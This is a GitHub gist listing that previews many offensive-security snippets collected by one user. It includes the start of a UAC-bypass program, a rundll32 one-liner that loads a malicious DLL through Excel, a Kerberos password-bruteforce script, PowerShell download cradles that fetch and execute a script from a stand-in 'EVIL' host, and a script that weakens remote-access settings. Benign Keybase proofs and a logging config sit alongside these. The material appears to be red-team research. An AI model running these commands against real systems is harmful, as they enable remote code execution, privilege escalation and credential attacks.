Jym Cheong jymcheong
@jymcheong
jymcheong / EventVwrBypass.cs
Created May 25, 2017 11:49
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass

Keybase proof

I hereby claim:

  • I am jymcheong on github.
  • I am jymcheong (https://keybase.io/jymcheong) on keybase.
  • I have a public key ASDyhHZXOSElNLw6pmYjkIV7zFuVlbyLE5ijcjY_nKmhKQo

To claim this, I am signing this object:

Keybase proof

I hereby claim:

  • I am jymcheong on github.
  • I am jym (https://keybase.io/jym) on keybase.
  • I have a public key ASDzhYMcTsIr1-tEfuHaJnmfe5OGtUmwmFRPz7Or4VYVBwo

To claim this, I am signing this object:

@jymcheong
jymcheong / excel.bat
Created July 13, 2017 11:31 — forked from ryhanson/ExcelXLL.md
Execute DLL via the Excel.Application object's RegisterXLL() method
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
@jymcheong
jymcheong / query.txt
Created July 17, 2017 06:56
nxlog query block
<Input in>
    Module        im_msvistalog
    ReadFromLast  True
    Query         <QueryList>\
                      <Query Id="0">\
                          <Select Path="Security">*</Select>\
                          <Select Path="System">*[System/Level=4]</Select>\
                          <Select Path="Application">*[Application/Level=2]</Select>\
                          <Select Path="Setup">*[System/Level=3]</Select>\
                      </Query>\
                  </QueryList>
</Input>
@jymcheong
jymcheong / kinit_brute.sh
Created July 29, 2017 08:08 — forked from ropnop/kinit_brute.sh
A quick tool to bruteforce an AD user's password by requesting TGTs from the Domain Controller with 'kinit'
#!/bin/bash
# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful
@jymcheong
jymcheong / sysmonRead.ps1
Created August 14, 2017 08:48
Read Sysmon Events from Remote
$comp = '<IP address>' # if in domain, use windows machine name
$username = '<Machine/admin_name>'
$password = '<Password>'
$pass = ConvertTo-SecureString -AsPlainText $password -Force
$SecureString = $pass
$MySecureCreds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $Username,$SecureString
#gwmi win32_service -credential $MySecureCreds -computer 172.16.199.162
#Invoke-WmiMethod -computer $comp -credential $MySecureCreds -Class win32_process -Name create -ArgumentList "notepad"
@jymcheong
jymcheong / DownloadCradles.ps1
Created August 14, 2017 12:38 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@jymcheong
jymcheong / psremoting.ps1
Created August 15, 2017 08:19 — forked from HarmJ0y/psremoting.ps1
Enable PSRemoting
#Run winrm quickconfig defaults
echo Y | winrm quickconfig
#Run enable psremoting command with defaults
Enable-PSRemoting -force
# adjust local token filter policy
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord
#Enable Trusted Hosts for universal access
@jymcheong
jymcheong / wmi_provider_association.ps1
Created August 20, 2017 02:17 — forked from mattifestation/wmi_provider_association.ps1
Enumerates WMI providers, the DLLs that back the provider, and the classes hosted by the provider.
<#
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
#>
function Get-WmiNamespace {
[OutputType([String])]
Param (
[String]
[ValidateNotNullOrEmpty()]